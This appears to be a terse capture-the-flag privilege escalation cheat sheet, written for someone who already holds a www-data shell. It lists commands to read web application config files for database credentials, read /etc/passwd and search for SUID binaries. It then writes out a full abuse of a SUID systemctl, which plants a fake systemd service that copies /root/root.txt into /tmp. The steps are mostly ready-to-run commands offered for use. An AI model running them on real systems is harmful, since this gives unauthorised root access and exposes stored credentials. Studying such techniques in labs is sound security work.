You just got a www-data shell :)

1. First thing you should look for is config files and especially some mysql config logs:
  cat /var/www/html/roundcube/config/config.inc.php (or something like that)

2. find / -user root -perm -4000 2>/dev/null

3. You found /bin/systemctl running SUID
create a script to cop /root/root.txt:

echo "/bin/cp /root/root.txt /tmp/root.txt" > /tmp/copy.sh
chmod +x /tmp/copy.sh

cat <<EOF > /tmp/fake.service
[Unit]
Description=Fake Service

[Service]
Type=oneshot
ExecStart=/tmp/copy.sh

[Install]
WantedBy=multi-user.target
EOF

Run this service with SUID systemctl:
/bin/systemctl link /tmp/fake.service
/bin/systemctl enable --now fake.service

check if /tmp/root.txt created:
cat /tmp/root.txt



-------------------------------------------------------------------------------------------------------------------
1. cat /var/www/html/crm.boxxxx.xxx/htdocs/conf/conf.php
maybe a sql dump

2. cat /etc/passwd

3. find / -type f -perm -04000 -ls 2>/dev/null
and search for anything you found poc exploits



